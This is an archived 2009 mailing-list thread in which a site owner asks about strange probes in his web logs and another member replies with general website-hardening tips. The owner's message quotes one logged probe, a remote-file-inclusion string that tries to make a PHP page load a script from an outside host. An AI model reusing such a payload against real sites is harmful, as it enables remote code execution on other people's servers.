[dba-Tech] weird website probes

Jim Lawrence accessd at shaw.ca
Fri Apr 10 12:41:53 CDT 2009


Hi Peter:

All sites get probed for weaknesses on the web. That is pretty standard.
Below is a list of common searches performed by serious hackers looking for
opportunities:

1. If any of your directories are readable and have important data that
information can be cleamed. If you have any important data in a website it
is open to anyone. There are many open-source or free products like
'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a
whole site as fast as the bandwidth will allow. 
2. Any directories that are writable can be used to either store temporary
information or leave time-bombs in hope that you may try and run them...
some gullible or tired webmasters have even inadvertently spawned zombies on
their sites that way.
3. Some sites that have open FTP (command line) accessible and even password
protected may find someone running a little loop routine attempting a
dictionary attack... given that there are usually no limits to how many
'trys' the hacker is allowed.
4. If you manager your own mail within your website build your mail service
correctly. Use a Captcha, return email etc... Any web site beyond a Postcard
site needs a database and a programmed backend for security and management.
5. If you do have admin access from your site keep the pasword long and
filled with mixed cases, numbers and special characters.

Outside of that you are really pretty safe. 

If you are using IIS, check you logs and see if there is a consistency of
login attempts: c:<windows directory>/system32/logfiles/*.log and if there
is you can block the range of IPs through IIS > default SMTP > properties >
Connection  > add. The site http://whois.domaintools.com/ can be a great
source for specifics on a hacker's locations. (I have found traditionally
client's attackers are from China and central European.)

You may already know all this but I HTH.

Jim  

-----Original Message-----
From: dba-tech-bounces at databaseadvisors.com
[mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley
Sent: Thursday, April 09, 2009 8:36 PM
To: Discussion of Hardware and Software issues
Subject: [dba-Tech] weird website probes

I've taken to studying NotFound/Unauthorised errors at our site. We get 
hundreds of weird probes a day, mostly in bursts, eg just a few minutes 
ago we got about a dozen of these in a few seconds:

www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.can
didography.com/zero/id1.txt??

www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks 
like a probe of some sort. A probe for what? GET-based vulnerabilities?  
Anybody have an idea what such vandals might be trying to accomplish?

PB




_______________________________________________
dba-Tech mailing list
dba-Tech at databaseadvisors.com
http://databaseadvisors.com/mailman/listinfo/dba-tech
Website: http://www.databaseadvisors.com




More information about the dba-Tech mailing list